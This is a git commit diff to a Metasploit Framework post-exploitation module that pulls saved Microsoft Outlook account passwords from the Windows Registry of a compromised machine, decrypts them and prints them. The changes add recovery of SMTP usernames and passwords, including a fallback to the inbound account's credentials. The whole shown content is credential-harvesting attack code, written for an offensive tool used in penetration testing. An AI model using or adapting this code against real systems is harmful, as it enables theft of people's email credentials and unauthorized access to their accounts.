Updated MS Outlook post module
parent
fe39642e27
commit
5e19918020
|
@ -1,4 +1,4 @@
|
|||
# $Id$
|
||||
# $Id: outlook.rb 14835 2012-03-01 22:15:05Z rapid7 $
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
|
@ -22,16 +22,16 @@ class Metasploit3 < Msf::Post
|
|||
super( update_info( info,
|
||||
'Name' => 'Windows Gather Microsoft Outlook Saved Password Extraction',
|
||||
'Description' => %q{
|
||||
This module extracts and attempts to decrypt saved Microsoft
|
||||
This module extracts and decrypts saved Microsoft
|
||||
Outlook (versions 2002-2010) passwords from the Windows
|
||||
Registry for POP3/IMAP/SMTP/HTTP accounts.
|
||||
In order for decryption to be successful, this module must be
|
||||
executed with the same privileges as the user which originally
|
||||
executed under the same privileges as the user which originally
|
||||
encrypted the password.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' => [ 'Justin Cacak'],
|
||||
'Version' => '$Revision$',
|
||||
'Version' => '$Revision: 14835 $',
|
||||
'Platform' => [ 'windows' ],
|
||||
'SessionTypes' => [ 'meterpreter' ]
|
||||
))
|
||||
|
@ -113,6 +113,7 @@ class Metasploit3 < Msf::Post
|
|||
if smtp_use_auth != nil
|
||||
smtp_user = get_valdata(k, 'SMTP User')
|
||||
smtp_password = get_valdata(k, 'SMTP Password')
|
||||
smtp_auth_method = get_valdata(k, 'SMTP Auth Method')
|
||||
end
|
||||
|
||||
if pop3_server != nil
|
||||
|
@ -126,7 +127,7 @@ class Metasploit3 < Msf::Post
|
|||
end
|
||||
|
||||
#Decrypt password and output results. Need to do each separately due to the way Microsoft stores them.
|
||||
print_status("Account Found:")
|
||||
print_good("Account Found:")
|
||||
print_status(" Type: #{type}")
|
||||
print_status(" User Display Name: #{displayname}")
|
||||
print_status(" User E-mail Address: #{email}")
|
||||
|
@ -176,9 +177,15 @@ class Metasploit3 < Msf::Post
|
|||
print_status(" Outgoing Mail Server (SMTP): #{smtp_server}")
|
||||
else
|
||||
print_status(" Outgoing Mail Server (SMTP): #{smtp_server} [Authentication Required]")
|
||||
print_status(" Outgoing Mail Server (SMTP) User Name: #{smtp_user}")
|
||||
# Check if smtp_auth_method is null. If so, the inbound credentials are utilized
|
||||
if smtp_auth_method == nil
|
||||
smtp_user = pop3_user
|
||||
smtp_decrypted_password = pass
|
||||
else
|
||||
smtp_password.slice!(0,1)
|
||||
smtp_decrypted_password = decrypt_password(smtp_password)
|
||||
end
|
||||
print_status(" Outgoing Mail Server (SMTP) User Name: #{smtp_user}")
|
||||
print_status(" Outgoing Mail Server (SMTP) Password: #{smtp_decrypted_password}")
|
||||
end
|
||||
|
||||
|
@ -271,9 +278,15 @@ class Metasploit3 < Msf::Post
|
|||
print_status(" Outgoing Mail Server (SMTP): #{smtp_server}")
|
||||
else
|
||||
print_status(" Outgoing Mail Server (SMTP): #{smtp_server} [Authentication Required]")
|
||||
print_status(" Outgoing Mail Server (SMTP) User Name: #{smtp_user}")
|
||||
# Check if smtp_auth_method is null. If so, the inbound credentials are utilized
|
||||
if smtp_auth_method == nil
|
||||
smtp_user = imap_user
|
||||
smtp_decrypted_password = pass
|
||||
else
|
||||
smtp_password.slice!(0,1)
|
||||
smtp_decrypted_password = decrypt_password(smtp_password)
|
||||
end
|
||||
print_status(" Outgoing Mail Server (SMTP) User Name: #{smtp_user}")
|
||||
print_status(" Outgoing Mail Server (SMTP) Password: #{smtp_decrypted_password}")
|
||||
end
|
||||
|
||||
|
|
Loading…
Reference in New Issue